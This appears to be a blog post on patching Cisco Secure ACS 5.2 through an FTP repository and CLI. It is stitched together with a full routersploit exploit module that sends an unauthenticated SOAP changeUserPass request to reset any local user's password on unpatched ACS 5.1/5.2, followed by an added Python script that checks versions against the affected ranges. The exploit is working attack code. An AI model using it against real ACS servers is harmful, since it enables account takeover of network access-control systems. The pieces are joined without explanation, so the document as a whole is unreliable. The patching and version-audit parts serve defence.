Cisco Acs 5.2 Patch Installation


I had to patch my ACS 5.2 server a couple of times and thought I would describe the process here. First, download the correct patch from the Cisco web site. You can find it via Products -> Security -> Access Control and Policy -> Policy and Access Management -> Cisco Secure Access Control System, or via this direct link. You need a valid CCO account and an ACS product purchased from Cisco with a valid contract.

Jun 25, 2018: I am trying to apply patch 5.2.0.26.10 to a newly installed Cisco Secure ACS Server. When I run the acs patch install command it fails. Here is my repos config: repository Update url s ftp://10.134.52.115/ user id4sftp password removed sh repo.

Step 3: Install the ACS 5.2 cumulative patch by running the following acs patch command in the EXEC mode to install the ACS patch: acs patch install patch-name.tar.gpg repository repository-name ACS displays.


In my case I downloaded the latest patch, “5-2-0-26-11.tar.gpg”, for my ACS 5.2 server. You need to create a software repository on your ACS before copying this file onto it. You can do this via “System Administration > Operations > Software Repositories”. Here is the screenshot of the software repository I created for this.

You can choose from multiple protocols, but I selected FTP after a quick search on the web: lots of users report that TFTP did not work properly. Here is the complete list of values you can choose from.

I used a free FTP server (FileZilla) installed on my laptop and created a username and password for ACS to use when talking to it. You can then install the patch on the ACS server by issuing the “acs patch install <filename> repository <repository-name>” CLI command. Here is the screenshot of my file transfer.

You can follow the progress on the ACS CLI as well. You should see something similar to this.

Once the patch is installed, you can verify the application status with the “show application status acs” and “show version” CLI commands. The screenshot below confirmed the application is running correctly.

If you are using the GUI, you can confirm the same by clicking the “About” button on the ACS admin page.

from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        'name': 'Cisco Secure ACS Unauthorized Password Change',
        'description': 'Module exploits an authentication bypass issue which allows arbitrary '
                       'password change requests to be issued for any user in the local store. '
                       'Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well '
                       'as version 5.2 with either no patches or patches 1 and 2 are vulnerable.',
        'authors': (
            'Jason Kratzer <pyoor[at]flinkd.org>',  # vulnerability discovery & metasploit module
            'Marcin Bury <marcin[at]threat9.com>',  # routersploit module
        ),
        'references': (
            'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html',
        ),
        'devices': (
            'Cisco Secure ACS version 5.1 with patch 3, 4, or 5 installed and without patch 6 or later installed',
            'Cisco Secure ACS version 5.2 without any patches installed',
            'Cisco Secure ACS version 5.2 with patch 1 or 2 installed and without patch 3 or later installed',
        ),
    }

    target = OptIP('', 'Target IPv4 or IPv6 address')
    port = OptPort(443, 'Target HTTP port')
    ssl = OptBool(True, 'SSL enabled: true/false')

    path = OptString('/PI/services/UCP/', 'Path to UCP WebService')
    username = OptString('', 'Username to use')
    password = OptString('', 'Password to use')

    def run(self):
        headers = {'SOAPAction': '"changeUserPass"'}

        data = ('<?xml version="1.0" encoding="utf-8"?>' + '\r\n'
                '<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" '
                'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" '
                'xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
                'xmlns:xsd="http://www.w3.org/1999/XMLSchema">' + '\r\n'
                '<SOAP-ENV:Body>' + '\r\n'
                '<ns1:changeUserPass xmlns:ns1="UCP" SOAP-ENC:root="1">' + '\r\n'
                '<v1 xsi:type="xsd:string">' + self.username + '</v1>' + '\r\n'
                '<v2 xsi:type="xsd:string">fakepassword</v2>' + '\r\n'
                '<v3 xsi:type="xsd:string">' + self.password + '</v3>' + '\r\n'
                '</ns1:changeUserPass>'
                '</SOAP-ENV:Body>' + '\r\n'
                '</SOAP-ENV:Envelope>' + '\r\n\r\n')

        print_status('Issuing password change request for: ' + self.username)

        response = self.http_request(
            method='POST',
            path=self.path,
            data=data,
            headers=headers
        )

        if response is None:
            print_error('Exploit failed. Target seems to be not vulnerable.')
            return

        if 'success' in response.text:
            print_success('Success! Password for {} has been changed to {}'.format(self.username, self.password))
        elif 'Password has already been used' in response.text:
            print_error('Failed! The supplied password has already been used.')
            print_error('Please change the password and try again.')
        elif 'Invalid credentials for user' in response.text:
            print_error('Failed! Username does not exist or target is not vulnerable.')
            print_error('Please change the username and try again.')
        else:
            print_error('Failed! An unknown error has occurred.')

    @mute
    def check(self):
        # it is not possible to verify if target is vulnerable without exploiting system
        return None
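
Since the module's check() cannot confirm exposure, the patch level reported by “show version” is what decides it. The following is an added example, not part of the routersploit module or the original post: it classifies ACS version strings against the ranges in the 'devices' list above. It assumes the fifth field of strings such as 5.2.0.26.10 is the cumulative patch number; the function names, hostnames and inventory are constructed for illustration.

```python
import re

# Ranges exactly as the 'devices' list above states them:
# (major, minor) -> (lowest affected patch, first unaffected patch)
AFFECTED = {
    (5, 1): (3, 6),  # 5.1 with patch 3, 4 or 5
    (5, 2): (0, 3),  # 5.2 unpatched, or with patch 1 or 2
}

_VERSION = re.compile(r'^(\d+)[.-](\d+)[.-]\d+[.-]\d+(?:[.-](\d+))?(?:\.tar\.gpg)?$')

def parse_acs_version(text):
    """Return (major, minor, patch) from '5.2.0.26.10' or '5-2-0-26-11.tar.gpg'.
    Assumption: the optional fifth field is the cumulative patch number, and
    a string without it describes an unpatched install."""
    m = _VERSION.match(text.strip())
    if not m:
        raise ValueError('unrecognised ACS version string: %r' % text)
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)

def is_affected(text):
    """True if the version is inside a range the page lists as vulnerable."""
    major, minor, patch = parse_acs_version(text)
    bounds = AFFECTED.get((major, minor))
    if bounds is None:
        return False  # release is not covered by the list on this page
    lowest, first_unaffected = bounds
    return lowest <= patch < first_unaffected

def audit(inventory):
    """Map host -> 'AFFECTED', 'ok' or 'unparsed' for a dict of version strings."""
    report = {}
    for host, version in inventory.items():
        try:
            report[host] = 'AFFECTED' if is_affected(version) else 'ok'
        except ValueError:
            report[host] = 'unparsed'  # needs a manual "show version" check
    return report

# Constructed inventory: hostnames are invented, strings follow the forms above.
SAMPLE = {'acs-a': '5.2.0.26', 'acs-b': '5.2.0.26.2', 'acs-c': '5.2.0.26.11',
          'acs-d': '5-2-0-26-11.tar.gpg', 'acs-e': 'unknown'}

if __name__ == '__main__':
    for host, state in sorted(audit(SAMPLE).items()):
        print(host, state)
```

A result of 'ok' only means the version is outside the ranges listed on this page; releases the list does not mention are not evaluated.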